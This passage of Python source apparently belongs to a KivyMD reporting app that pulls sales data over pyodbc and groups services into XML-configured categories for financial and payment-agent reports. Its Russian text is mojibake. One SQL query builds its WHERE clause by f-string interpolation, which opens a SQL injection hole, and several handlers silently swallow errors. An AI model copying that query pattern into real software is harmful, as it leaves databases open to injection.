'open_time': datetime(...),
'paid_sum': Decimal()
}
"""
cnxn = pyodbc.connect(f'DRIVER={driver};SERVER={server};DATABASE={database};UID={user};PWD={pwd}')
date_from = date_from.strftime('%Y%m%d 00:00:00')
date_to = date_to.strftime('%Y%m%d 00:00:00')
cursor = cnxn.cursor()
cursor.execute(
f"""{''}
SELECT OPENTIME, STATIONID, PAIDSUM FROM ORDERS
WHERE STATIONID = {cash_id} AND OPENTIME > '{date_from}' AND OPENTIME < '{date_to}'
"""
)
rows = cursor.fetchall()
report = [{'station_id': row[0], 'open_time': row[1], 'paid_sum': row[2]} for row in rows]
logging.info(
f"{__name__}: {str(datetime.now())[:-7]}: "
f"ะััะตั ะฟะพ P-Keeper ััะพะผะธัะพะฒะฐะฝ, ะะตัะธะพะด: {date_from[:8]}-{date_to[:8]}"
)
return report
def find_new_service(self, service_dict, orgs_dict):
"""
ะะพะธัะบ ะฝะพะฒัั
ััะปัะณ ะธ ะพัะณะฐะฝะธะทะฐัะธะน ะธะท XML
:param service_dict: ะัะพะณะพะฒัะน ะพััะตั
:param orgs_dict: ัะปะพะฒะฐัั ะธะท XML-ัะฐะนะปะฐ
:return:
"""
servise_set = set()
for key in orgs_dict:
for s in orgs_dict[key]:
servise_set.add(s)
for org in service_dict:
if org not in servise_set and org not in self.new_service:
self.new_service.append(org)
servise_set.add(org)
for key in orgs_dict:
if key not in self.orgs:
self.orgs.append(key)
def distibution_service(self):
"""
ะะทะฒะปะตะบะฐะตั ััะปัะณั ะธะท ัะฟะธัะบะฐ ะฝะพะฒัั
ััะปัะณ ะธ ะฒัะทัะฒะฐะตั ัะฟะธัะพะบ ะณััะฟะฟ ะดะพ ัะตั
ะฟะพั ะฟะพะบะฐ ะตััั ะฝะพะฒัะต ััะปัะณะธ,
ะทะฐัะตะผ ะฟะตัะตะดะฐะตั ัะฟัะฐะฒะปะตะฝะธะต ัะปะตะดัััะตะน ััะฝะบัะธะธ
"""
if self.new_service:
service = self.new_service.pop()
self.viev_orgs(service)
else:
self.agentservice()
def viev_orgs(self, service):
"""
ะัะฒะพะดะธั ะฒัะฟะปัะฒะฐััะธะน ัะฟะธัะพะบ ะณััะฟะฟ, ะฟัะธ ะบะปะธะบะต ะฝะฐ ะพะดะฝั ะธะท ะบะพัะพััั
ััะปัะณะฐ ัะบะฐะทะฐะฝะฝะฐั ะฒ ะทะฐะณะพะปะพะฒะบะต ะดะพะฑะฐะฒะปัะตััั ะฒ ะฝะตะต
"""
bs = MDListBottomSheet()
bs.add_item(f'ะ ะบะฐะบะพะน ะณััะฟะฟะต ะพััะตัะฐ ะพัะฝะพัะธััั ััะปัะณะฐ "{service}"? (1 ะธะท {len(self.new_service) + 1})',
lambda x: x)
for i in range(len(self.orgs)):
if self.orgs[i] != 'ะะขะะะ' and self.orgs[i] != 'ะะตะฟะพะทะธั' and self.orgs[i] != 'ะะฐัะฐ':
bs.add_item(self.orgs[i], lambda x: self.select_org(service, x.text), icon='nfc')
bs.add_item(f'ะะพะฑะฐะฒะธัั ะฝะพะฒัั ะณััะฟะฟั ะพััะตัะฐ...',
lambda x: self.show_dialog_add_org("ะะพะฒะฐั ะณััะฟะฟะฐ", "ะะฐะทะฒะฐะฝะธะต ะฝะพะฒะพะน ะณััะฟะฟั", service))
bs.open()
def show_dialog_add_org(self, title, text, service):
"""
ะัะฒะพะดะธั ะดะธะฐะปะพะณะพะฒะพะต ะพะบะฝะพ ั ะฒะพะทะผะพะถะฝะพััั ะฒะฒะพะดะฐ ะธะผะตะฝะธ ะฝะพะฒะพะน ะณััะฟะฟั ะธ ะดะฒัะผั ะบะฝะพะฟะบะฐะผะธ
"""
content = MDTextField(hint_text="Persistent helper text222",
helper_text="Text is always here111",
helper_text_mode="persistent",
text=text,
)
dialog = MDDialog(title=title,
content=content,
size_hint=(.8, None),
height=dp(200),
auto_dismiss=False)
dialog.add_action_button("ะัะผะตะฝะฐ", action=lambda *x: (dialog.dismiss(), self.readd_org(service)))
dialog.add_action_button("ะะพะฑะฐะฒะธัั",
action=lambda *x: (dialog.dismiss(), self.create_new_org(dialog.content.text, service)))
dialog.open()
def create_new_org(self, name, service):
"""
ะะพะฑะฐะฒะปัะตั ะฝะพะฒัั ะพัะณะฐะฝะธะทะฐัะธั ะฒ ัะฟะธัะพะบ ะพัะณะฐะฝะธะทะฐัะธะน self.orgs, ัะปะพะฒะฐัั self.orgs_dict ะธ XML ะบะพะฝัะธะณััะฐัะธั.
ะะพะทะฒัะฐัะฐะตั ะธะทััััั ัะฐะฝะตะต ััะปัะณั ะฒ ัะฟะธัะพะบ ะฝะพะฒัั
ััะปัะณ ั ะฟะพะผะพััั ััะฝะบัะธะธ self.readd_org
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะพะฑะฐะฒะปะตะฝะธะต ะฝะพะฒะพะน ะณััะฟะฟั - {name}')
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะพะฑะฐะฒะปะตะฝะธะต ััะปัะณะธ {service} ะฒ ะณััะฟะฟั {name}')
self.orgs.append(name)
self.orgs_dict[name] = []
self.readd_org(service)
with open(self.reportXML, encoding='utf-8') as f:
xml = f.read()
root = objectify.fromstring(xml)
#ะะพะฑะฐะฒะปัะตะผ ะฝะพะฒัะต ะพัะณะฐะฝะธะทะฐัะธะธ
new_org = objectify.SubElement(root, "UrFace")
new_org.set('Name', name)
new_servs = objectify.SubElement(new_org, 'Services')
new_serv = objectify.SubElement(new_servs, 'Service')
new_serv.set('Name', 'ะัััะฐั ะพะฑัะทะฐัะตะปัะฝะฐั ะบะฐัะตะณะพัะธั')
# ัะดะฐะปัะตะผ ะฐะฝะฝะพัะฐัะธะธ.
objectify.deannotate(root)
etree.cleanup_namespaces(root)
obj_xml = etree.tostring(root,
encoding='utf-8',
pretty_print=True,
xml_declaration=True
)
# ัะพั
ัะฐะฝัะตะผ ะดะฐะฝะฝัะต ะฒ ัะฐะนะป.
try:
with open(self.reportXML, "w", encoding='utf_8_sig') as xml_writer:
xml_writer.write(obj_xml.decode('utf-8'))
except IOError:
pass
def readd_org(self, service):
"""
ะะพะทะฒัะฐัะฐะตั ะธะทััััั ัะฐะฝะตะต ััะปัะณั ะฒ ัะฟะธัะพะบ ะฝะพะฒัั
ััะปัะณ, ะทะฐัะตะผ ะฒัะทัะฒะฐะตั ััะฝะบัะธั ัะฐัะฟัะตะดะตะปะตะฝะธั
"""
self.new_service.append(service)
self.distibution_service()
def select_org(self, service, org):
"""
ะะพะฑะฐะฒะปัะตั ััะปัะณั ะฒ ัะฟะธัะพะบ ััะปัะณ ะธ ะฒัะทัะฒะฐะตั ััะฝะบัะธั ัะฐัะฟัะตะดะตะปะตะฝะธั ะดะปั ะดััะณะธั
ััะปัะณ
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะพะฑะฐะฒะปะตะฝะธะต ััะปัะณะธ {service} ะฒ ะณััะฟะฟั {org}')
self.orgs_dict[org].append(service)
#ะะฐะฟะธัั ะฝะพะฒะพะน ััะปัะณะธ ะฒ XML
with open(self.reportXML, encoding='utf-8') as f:
xml = f.read()
root = objectify.fromstring(xml)
# ะะตัะตัะธัะปัะตะผ ัััะตััะฒัััะธะต ะพัะณะฐะฝะธะทะฐัะธะธ ะฒ ัะฐะนะปะต ะธ ะดะพะฑะฐะฒะปัะตะผ ะฝะพะฒัะต ัััะพัะบะธ
for x in root.UrFace:
if x.get('Name') == org:
Service = objectify.SubElement(x.Services, "Service")
Service.set("Name", service)
# ัะดะฐะปัะตะผ ะฐะฝะฝะพัะฐัะธะธ.
objectify.deannotate(root)
etree.cleanup_namespaces(root)
obj_xml = etree.tostring(root, encoding='utf-8', pretty_print=True, xml_declaration=True)
# ัะพั
ัะฐะฝัะตะผ ะดะฐะฝะฝัะต ะฒ ัะฐะนะป.
try:
with open(self.reportXML, "w", encoding='utf_8_sig') as xml_writer:
xml_writer.write(obj_xml.decode('utf-8'))
except IOError:
pass
self.distibution_service()
def agentservice(self):
self.agent_dict = self.read_reportgroup(self.agentXML)
self.find_new_agentservice(self.itog_report_org1, self.agent_dict)
self.find_new_agentservice(self.itog_report_org1_lastyear, self.agent_dict)
self.find_new_agentservice(self.itog_report_org3, self.agent_dict)
self.find_new_agentservice(self.itog_report_org3_lastyear, self.agent_dict)
if self.itog_report_month:
self.find_new_agentservice(self.itog_report_month, self.agent_dict)
self.distibution_agentservice()
def distibution_agentservice(self):
if self.new_agentservice:
service = self.new_agentservice.pop()
self.viev_agentorgs(service)
else:
self.save_reports()
def find_new_agentservice(self, service_dict, orgs_dict):
"""
ะะพะธัะบ ะฝะพะฒัั
ััะปัะณ ะธ ะพัะณะฐะฝะธะทะฐัะธะน ะธะท XML
:param service_dict: ะัะพะณะพะฒัะน ะพััะตั
:param orgs_dict: ัะปะพะฒะฐัั ะธะท XML-ัะฐะนะปะฐ
:return:
"""
servise_set = set()
for key in orgs_dict:
for s in orgs_dict[key]:
servise_set.add(s)
for org in service_dict:
if org not in servise_set and org not in self.new_agentservice:
self.new_agentservice.append(org)
servise_set.add(org)
for key in orgs_dict:
if key not in self.agentorgs:
self.agentorgs.append(key)
def viev_agentorgs(self, service):
"""
ะัะฒะพะดะธั ะฒัะฟะปัะฒะฐััะธะน ัะฟะธัะพะบ ะพัะณะฐะฝะธะทะฐัะธะน,
ะฟัะธ ะบะปะธะบะต ะฝะฐ ะพะดะฝั ะธะท ะบะพัะพััั
ััะปัะณะฐ ัะบะฐะทะฐะฝะฝะฐั ะฒ ะทะฐะณะพะปะพะฒะบะต ะดะพะฑะฐะฒะปัะตััั ะฒ ะฝะตะต
"""
bs = MDListBottomSheet()
bs.add_item(f'ะ ะบะฐะบะพะน ะพัะณะฐะฝะธะทะฐัะธะธ ะพัะฝะพัะธััั ััะปัะณะฐ "{service}"? (1 ะธะท {len(self.new_agentservice) + 1})',
lambda x: x)
for i in range(len(self.agentorgs)):
if self.agentorgs[i] != 'ะะขะะะ' and self.agentorgs[i] != 'ะะตะฟะพะทะธั' and self.agentorgs[i] != 'ะะฐัะฐ':
bs.add_item(self.agentorgs[i], lambda x: self.select_agentorg(service, x.text), icon='nfc')
bs.add_item(f'ะะพะฑะฐะฒะธัั ะฝะพะฒัั ะพัะณะฐะฝะธะทะฐัะธั...',
lambda x: self.show_dialog_add_agentorg('ะะฐะธะผะตะฝะพะฒะฐะฝะธะต ะพัะณะฐะฝะธะทะฐัะธะธ', 'ะะะ ะ ะพะณะฐ ะธ ะะพะฟััะฐ', service))
bs.open()
def select_agentorg(self, service, org):
"""
ะะพะฑะฐะฒะปัะตั ััะปัะณั ะฒ ัะฟะธัะพะบ ััะปัะณ ะธ ะฒัะทัะฒะฐะตั ััะฝะบัะธั ัะฐัะฟัะตะดะตะปะตะฝะธั ะดะปั ะดััะณะธั
ััะปัะณ
"""
self.agent_dict[org].append(service)
#ะะฐะฟะธัั ะฝะพะฒะพะน ััะปัะณะธ ะฒ XML
with open(self.agentXML, encoding='utf-8') as f:
xml = f.read()
root = objectify.fromstring(xml)
# ะะตัะตัะธัะปัะตะผ ัััะตััะฒัััะธะต ะพัะณะฐะฝะธะทะฐัะธะธ ะฒ ัะฐะนะปะต ะธ ะดะพะฑะฐะฒะปัะตะผ ะฝะพะฒัะต ัััะพัะบะธ
for x in root.UrFace:
if x.get('Name') == org:
Service = objectify.SubElement(x.Services, "Service")
Service.set("Name", service)
# ัะดะฐะปัะตะผ ะฐะฝะฝะพัะฐัะธะธ.
objectify.deannotate(root)
etree.cleanup_namespaces(root)
obj_xml = etree.tostring(root, encoding='utf-8', pretty_print=True, xml_declaration=True)
# ัะพั
ัะฐะฝัะตะผ ะดะฐะฝะฝัะต ะฒ ัะฐะนะป.
try:
with open(self.agentXML, "w", encoding='utf_8_sig') as xml_writer:
xml_writer.write(obj_xml.decode('utf-8'))
except IOError:
pass
self.distibution_agentservice()
def show_dialog_add_agentorg(self, title, text, service):
"""
ะัะฒะพะดะธั ะดะธะฐะปะพะณะพะฒะพะต ะพะบะฝะพ ั ะฒะพะทะผะพะถะฝะพััั ะฒะฒะพะดะฐ ะธะผะตะฝะธ ะฝะพะฒะพะน ะพัะณะฐะฝะธะทััะธะธ ะธ ะดะฒัะผั ะบะฝะพะฟะบะฐะผะธ
"""
content = MDTextField(hint_text="Persistent helper text222",
helper_text="Text is always here111",
helper_text_mode="persistent",
text=text,
)
dialog = MDDialog(title=title,
content=content,
size_hint=(.8, None),
height=dp(200),
auto_dismiss=False)
dialog.add_action_button("ะัะผะตะฝะฐ", action=lambda *x: (dialog.dismiss(), self.readd_agentorg(service)))
dialog.add_action_button("ะะพะฑะฐะฒะธัั",
action=lambda *x: (dialog.dismiss(), self.create_new_agentorg(dialog.content.text, service)))
dialog.open()
def create_new_agentorg(self, name, service):
"""
ะะพะฑะฐะฒะปัะตั ะฝะพะฒัั ะพัะณะฐะฝะธะทะฐัะธั ะฒ ัะฟะธัะพะบ ะพัะณะฐะฝะธะทะฐัะธะน self.orgs, ัะปะพะฒะฐัั self.orgs_dict ะธ XML ะบะพะฝัะธะณััะฐัะธั.
ะะพะทะฒัะฐัะฐะตั ะธะทััััั ัะฐะฝะตะต ััะปัะณั ะฒ ัะฟะธัะพะบ ะฝะพะฒัั
ััะปัะณ ั ะฟะพะผะพััั ััะฝะบัะธะธ self.readd_org
"""
self.agentorgs.append(name)
self.agent_dict[name] = []
self.readd_agentorg(service)
with open(self.agentXML, encoding='utf-8') as f:
xml = f.read()
root = objectify.fromstring(xml)
#ะะพะฑะฐะฒะปัะตะผ ะฝะพะฒัะต ะพัะณะฐะฝะธะทะฐัะธะธ
new_org = objectify.SubElement(root, "UrFace")
new_org.set('Name', name)
new_servs = objectify.SubElement(new_org, 'Services')
new_serv = objectify.SubElement(new_servs, 'Service')
new_serv.set('Name', 'ะัััะฐั ะพะฑัะทะฐัะตะปัะฝะฐั ะบะฐัะตะณะพัะธั')
# ัะดะฐะปัะตะผ ะฐะฝะฝะพัะฐัะธะธ.
objectify.deannotate(root)
etree.cleanup_namespaces(root)
obj_xml = etree.tostring(root,
encoding='utf-8',
pretty_print=True,
xml_declaration=True
)
# ัะพั
ัะฐะฝัะตะผ ะดะฐะฝะฝัะต ะฒ ัะฐะนะป.
try:
with open(self.agentXML, "w", encoding='utf_8_sig') as xml_writer:
xml_writer.write(obj_xml.decode('utf-8'))
except IOError:
pass
def readd_agentorg(self, service):
"""
ะะพะทะฒัะฐัะฐะตั ะธะทััััั ัะฐะฝะตะต ััะปัะณั ะฒ ัะฟะธัะพะบ ะฝะพะฒัั
ััะปัะณ, ะทะฐัะตะผ ะฒัะทัะฒะฐะตั ััะฝะบัะธั ัะฐัะฟัะตะดะตะปะตะฝะธั
"""
self.new_agentservice.append(service)
self.distibution_agentservice()
def fin_report(self):
"""
ะคะพัะผะธะฝัะตั ัะธะฝะฐะฝัะพะฒัะน ะพััะตั ะฒ ัััะฐะฝะพะฒะปะตะฝะฝะพะผ ัะพัะผะฐัะต
:return - dict
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะคะพัะผะธัะพะฒะฐะฝะธะต ัะธะฝะฐะฝัะพะฒะพะณะพ ะพััะตัะฐ')
self.finreport_dict = {}
is_aquazona = None
for org, services in self.orgs_dict.items():
if org != 'ะะต ััะธััะฒะฐัั':
self.finreport_dict[org] = [0, 0.00]
for serv in services:
try:
if org == 'ะะฐัะฐ':
self.finreport_dict[org][0] = self.itog_report_org1[serv][0]
self.finreport_dict[org][1] = self.itog_report_org1[serv][1]
elif serv == 'ะะตะฟะพะทะธั':
self.finreport_dict[org][1] += self.itog_report_org1[serv][1]
elif serv == 'ะะบะฒะฐะทะพะฝะฐ':
self.finreport_dict['ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ'] = [self.itog_report_org1[serv][0], 0]
self.finreport_dict[org][1] += self.itog_report_org1[serv][1]
is_aquazona = True
elif serv == 'ะัะณะฐะฝะธะทะฐัะธั':
pass
else:
if self.itog_report_org1.get(serv) and self.itog_report_org1[serv][1] != 0.0:
self.finreport_dict[org][0] += self.itog_report_org1[serv][0]
self.finreport_dict[org][1] += self.itog_report_org1[serv][1]
if self.itog_report_org3.get(serv) and self.itog_report_org3[serv][1] != 0.0:
self.finreport_dict[org][0] += self.itog_report_org3[serv][0]
self.finreport_dict[org][1] += self.itog_report_org3[serv][1]
except KeyError:
pass
except TypeError:
pass
if not is_aquazona:
self.finreport_dict['ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ'] = [0, 0.00]
self.finreport_dict.setdefault('Online ะัะพะดะฐะถะธ', [0, 0.0])
self.finreport_dict['Online ะัะพะดะฐะถะธ'][0] += self.report_bitrix[0]
self.finreport_dict['Online ะัะพะดะฐะถะธ'][1] += self.report_bitrix[1]
self.finreport_dict['ะกะผะฐะนะป'][0] = len(self.report_rk)
self.finreport_dict['ะกะผะฐะนะป'][1] = float(sum([line['paid_sum'] for line in self.report_rk]))
def fin_report_lastyear(self):
"""
ะคะพัะผะธะฝัะตั ัะธะฝะฐะฝัะพะฒัะน ะพััะตั ะทะฐ ะฟัะตะดัะดััะธะน ะณะพะด ะฒ ัััะฐะฝะพะฒะปะตะฝะฝะพะผ ัะพัะผะฐัะต
:return - dict
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะคะพัะผะธัะพะฒะฐะฝะธะต ัะธะฝะฐะฝัะพะฒะพะณะพ ะพััะตัะฐ ะทะฐ ะฟัะพัะปัะน ะณะพะด')
self.finreport_dict_lastyear = {}
is_aquazona = None
for org, services in self.orgs_dict.items():
if org != 'ะะต ััะธััะฒะฐัั':
self.finreport_dict_lastyear[org] = [0, 0.00]
for serv in services:
try:
if org == 'ะะฐัะฐ':
self.finreport_dict_lastyear[org][0] = self.itog_report_org1_lastyear[serv][0]
self.finreport_dict_lastyear[org][1] = self.itog_report_org1_lastyear[serv][1]
elif serv == 'ะะตะฟะพะทะธั':
self.finreport_dict_lastyear[org][1] += self.itog_report_org1_lastyear[serv][1]
elif serv == 'ะะบะฒะฐะทะพะฝะฐ':
self.finreport_dict_lastyear['ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ'] = [self.itog_report_org1_lastyear[serv][0], 0]
self.finreport_dict_lastyear[org][1] += self.itog_report_org1_lastyear[serv][1]
is_aquazona = True
elif serv == 'ะัะณะฐะฝะธะทะฐัะธั':
pass
else:
if self.itog_report_org1_lastyear.get(serv) \
and self.itog_report_org1_lastyear[serv][1] != 0.0:
self.finreport_dict_lastyear[org][0] += self.itog_report_org1_lastyear[serv][0]
self.finreport_dict_lastyear[org][1] += self.itog_report_org1_lastyear[serv][1]
if self.itog_report_org3_lastyear.get(serv) \
and self.itog_report_org3_lastyear[serv][1] != 0.0:
self.finreport_dict_lastyear[org][0] += self.itog_report_org3_lastyear[serv][0]
self.finreport_dict_lastyear[org][1] += self.itog_report_org3_lastyear[serv][1]
except KeyError:
pass
except TypeError:
pass
if not is_aquazona:
self.finreport_dict_lastyear['ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ'] = [0, 0.00]
self.finreport_dict_lastyear.setdefault('Online ะัะพะดะฐะถะธ', [0, 0.0])
self.finreport_dict_lastyear['Online ะัะพะดะฐะถะธ'][0] += self.report_bitrix_lastyear[0]
self.finreport_dict_lastyear['Online ะัะพะดะฐะถะธ'][1] += self.report_bitrix_lastyear[1]
self.finreport_dict_lastyear['ะกะผะฐะนะป'][0] = len(self.report_rk_lastyear)
self.finreport_dict_lastyear['ะกะผะฐะนะป'][1] = float(sum([line['paid_sum'] for line in self.report_rk_lastyear]))
def fin_report_month(self):
"""
ะคะพัะผะธะฝัะตั ัะธะฝะฐะฝัะพะฒัะน ะพััะตั ะทะฐ ะผะตััั ะฒ ัััะฐะฝะพะฒะปะตะฝะฝะพะผ ัะพัะผะฐัะต
:return - dict
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะคะพัะผะธัะพะฒะฐะฝะธะต ัะธะฝะฐะฝัะพะฒะพะณะพ ะพััะตัะฐ ะทะฐ ะผะตััั')
self.finreport_dict_month = {}
control_sum_group = self.finreport_dict_month.setdefault('ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ', {})
control_sum = control_sum_group.setdefault('Cัะผะผะฐ', [['ะกัะผะผะฐ', 0, 0.0]])
smile = [len(self.report_rk_month), float(sum([line['paid_sum'] for line in self.report_rk_month]))]
for group_name, groups in self.itogreport_group_dict.items():
finreport_group = self.finreport_dict_month.setdefault(group_name, {})
finreport_group_total = finreport_group.setdefault('ะัะพะณะพ ะฟะพ ะณััะฟะฟะต', [['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต', 0, 0.0]])
for oldgroup in groups:
try:
for product_name in self.orgs_dict[oldgroup]:
try:
product = self.itog_report_month[product_name]
if product_name == 'ะะฐัะฐ':
product_group = finreport_group.setdefault(oldgroup, [])
product_group.append([product_name, product[0], product[1]])
elif product_name == 'ะะตะฟะพะทะธั':
product_group = finreport_group.setdefault(oldgroup, [])
product_group.append([product_name, 0, product[1]])
finreport_group_total[0][2] += product[1]
control_sum[0][2] += product[1]
elif product_name == 'ะัะณะฐะฝะธะทะฐัะธั':
pass
else:
product_group = finreport_group.setdefault(product[2], [['ะัะพะณะพ ะฟะพ ะฟะฐะฟะบะต', 0, 0.0]])
product_group.append([product_name, product[0], product[1]])
product_group[0][1] += product[0]
product_group[0][2] += product[1]
finreport_group_total[0][1] += product[0]
finreport_group_total[0][2] += product[1]
if product_name != 'ะัะพะณะพ ะฟะพ ะพััะตัั':
control_sum[0][1] += product[0]
control_sum[0][2] += product[1]
except KeyError:
continue
except TypeError:
continue
except KeyError as e:
self.show_dialog('ะะตัะพะพัะฒะตัััะฒะธะต ะบะพะฝัะธะณััะฐัะธะน XML-ัะฐะนะปะพะฒ', f'ะััะฟะฟะฐ {oldgroup} ะฝะต ัััะตััะฒัะตั!\n'
f'KeyError: {e}')
logging.error(f'{__name__}: {str(datetime.now())[:-7]}: ะะตัะพะพัะฒะตัััะฒะธะต ะบะพะฝัะธะณััะฐัะธะน XML-ัะฐะนะปะพะฒ\n'
f'ะััะฟะฟะฐ {oldgroup} ะฝะต ัััะตััะฒัะตั! \nKeyError: {e}')
if oldgroup == 'ะะฑัะตะฟะธั':
product_group = finreport_group.setdefault(
'ะะฑัะตะฟะธั ------------------------------------------------------------------------------ ะะ ะกะฐะปะฐั
ะพะฒะฐ',
[['ะัะพะณะพ ะฟะพ ะฟะฐะฟะบะต', 0, 0.0]]
)
product_group.append(['ะกะผะฐะนะป', smile[0], smile[1]])
product_group[0][1] += smile[0]
product_group[0][2] += smile[1]
finreport_group_total[0][1] += smile[0]
finreport_group_total[0][2] += smile[1]
control_sum[0][1] += smile[0]
control_sum[0][2] += smile[1]
self.finreport_dict_month['ะะขะะะ']['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต'][0][1] += smile[0]
self.finreport_dict_month['ะะขะะะ']['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต'][0][2] += smile[1]
self.finreport_dict_month['ะะขะะะ'][''][0][1] += smile[0]
self.finreport_dict_month['ะะขะะะ'][''][0][2] += smile[1]
self.finreport_dict_month['ะะขะะะ'][''][1][1] += smile[0]
self.finreport_dict_month['ะะขะะะ'][''][1][2] += smile[1]
if self.finreport_dict_month['ะะขะะะ'][''][1][2] != control_sum[0][2] \
or self.finreport_dict_month['ะะขะะะ'][''][1][1] != control_sum[0][1]:
self.show_dialog(
"ะะตัะพะพัะฒะตัััะฒะธะต ะะพะฝััะพะปัะฝัั
ััะผะผ.",
f"ะัะพะณะพ ะฟะพ ะพััะตัั ({self.finreport_dict_month['ะะขะะะ'][''][1][1]}: "
f"{self.finreport_dict_month['ะะขะะะ'][''][1][2]}) ะฝะต ัะฐะฒะฝะพ ะะพะฝััะพะปัะฝะพะน ััะผะผะต ััะปัะณ"
f"({control_sum[0][1]}: {control_sum[0][2]})"
)
logging.error(
f"{__name__}: {str(datetime.now())[:-7]}: ะะตัะพะพัะฒะตัััะฒะธะต ะะพะฝััะพะปัะฝัั
ััะผะผ. "
f"ะัะพะณะพ ะฟะพ ะพััะตัั ({self.finreport_dict_month['ะะขะะะ'][''][1][1]}: "
f"{self.finreport_dict_month['ะะขะะะ'][''][1][2]}) ะฝะต ัะฐะฒะฝะพ ะะพะฝััะพะปัะฝะพะน ััะผะผะต ััะปัะณ"
f"({control_sum[0][1]}: {control_sum[0][2]})")
def fin_report_beach(self):
"""
ะคะพัะผะธะฝัะตั ัะธะฝะฐะฝัะพะฒัะน ะพััะตั ะฟะพ ะฟะปัะถั ะฒ ัััะฐะฝะพะฒะปะตะฝะฝะพะผ ัะพัะผะฐัะต
:return - dict
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะคะพัะผะธัะพะฒะฐะฝะธะต ัะธะฝะฐะฝัะพะฒะพะณะพ ะพััะตัะฐ ะฟะพ ะฟะปัะถั')
self.finreport_dict_beach = {
'ะะตะฟะพะทะธั': (0, 0),
'ะขะพะฒะฐัั': (0, 0),
'ะฃัะปัะณะธ': (0, 0),
'ะะฐััั': (0, 0),
'ะัะพะณะพ ะฟะพ ะพััะตัั': (0, 0),
}
for service in self.itog_report_org2:
if service == 'ะะฐัะฐ':
self.finreport_dict_beach[service] = \
self.itog_report_org2[service][0], self.itog_report_org2[service][1]
elif service == 'ะัั
ะพะด ั ะฟะปัะถะฐ':
self.finreport_dict_beach[service] = \
self.itog_report_org2[service][0], self.itog_report_org2[service][1]
elif not self.itog_report_org2[service][3] in self.finreport_dict_beach:
self.finreport_dict_beach[self.itog_report_org2[service][3]] = \
self.itog_report_org2[service][0], self.itog_report_org2[service][1]
else:
try:
self.finreport_dict_beach[self.itog_report_org2[service][3]] = \
self.finreport_dict_beach[self.itog_report_org2[service][3]][0] + self.itog_report_org2[service][0], \
self.finreport_dict_beach[self.itog_report_org2[service][3]][1] + self.itog_report_org2[service][1]
except TypeError:
pass
if 'ะัั
ะพะด ั ะฟะปัะถะฐ' not in self.finreport_dict_beach:
self.finreport_dict_beach['ะัั
ะพะด ั ะฟะปัะถะฐ'] = 0, 0
def agent_report(self):
"""
ะคะพัะผะธะฝัะตั ะพััะตั ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ ะฒ ัััะฐะฝะพะฒะปะตะฝะฝะพะผ ัะพัะผะฐัะต
:return - dict
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะคะพัะผะธัะพะฒะฐะฝะธะต ะพััะตัะฐ ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ')
self.agentreport_dict = {}
self.agentreport_dict['ะัะณะฐะฝะธะทะฐัะธั'] = [self.org1[0], self.org1[1]]
for org, services in self.agent_dict.items():
if org != 'ะะต ััะธััะฒะฐัั':
self.agentreport_dict[org] = [0, 0]
for serv in services:
try:
if org == 'ะะฐัะฐ':
self.agentreport_dict[org][0] = self.itog_report_org1[serv][0]
self.agentreport_dict[org][1] = self.itog_report_org1[serv][1]
elif serv == 'ะะตะฟะพะทะธั':
self.agentreport_dict[org][1] += self.itog_report_org1[serv][1]
elif serv == 'ะะบะฒะฐะทะพะฝะฐ':
self.agentreport_dict[org][1] += self.itog_report_org1[serv][1]
elif serv == 'ะัะณะฐะฝะธะทะฐัะธั':
pass
else:
self.agentreport_dict[org][0] += self.itog_report_org1[serv][0]
self.agentreport_dict[org][1] += self.itog_report_org1[serv][1]
except KeyError:
pass
except TypeError:
pass
def agent_report_month(self):
"""
ะคะพัะผะธะฝัะตั ะพััะตั ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ ะทะฐ ะผะตััั ะฒ ัััะฐะฝะพะฒะปะตะฝะฝะพะผ ัะพัะผะฐัะต
:return - dict
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะคะพัะผะธัะพะฒะฐะฝะธะต ะพััะตัะฐ ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ ะทะฐ ะผะตััั')
self.agentreport_dict_month = {}
self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ'] = {}
self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'] = [['ะกัะผะผะฐ', 0, 0.0]]
for org in self.agent_dict:
self.agentreport_dict_month[org] = {}
self.agentreport_dict_month[org]['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต'] = [
['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต', 0, 0.0]
]
for tariff in self.agent_dict[org]:
try:
if tariff == 'ะะฐัะฐ':
self.agentreport_dict_month[org][tariff] = []
self.agentreport_dict_month[org][tariff].append(
[tariff, self.itog_report_month[tariff][0], self.itog_report_month[tariff][1]]
)
elif tariff == 'ะะตะฟะพะทะธั':
self.agentreport_dict_month[org][tariff] = []
self.agentreport_dict_month[org][tariff].append(
[tariff, 0, self.itog_report_month[tariff][1]]
)
self.agentreport_dict_month[org]['ะัะพะณะพ ะฟะพ ะณััะฟะฟะต'][0][2] += self.itog_report_month[tariff][1]
self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][2] += self.itog_report_month[tariff][1]
elif tariff == 'ะัะณะฐะฝะธะทะฐัะธั':
pass
else:
try:
if self.agentreport_dict_month[org][self.itog_report_month[tariff][2]]:
self.agentreport_dict_month[org][self.itog_report_month[tariff][2]]. \
append([tariff, self.itog_report_month[tariff][0], self.itog_report_month[tariff][1]])
self.agentreport_dict_month[org][self.itog_report_month[tariff][2]][0][1] += \
self.itog_report_month[tariff][0]
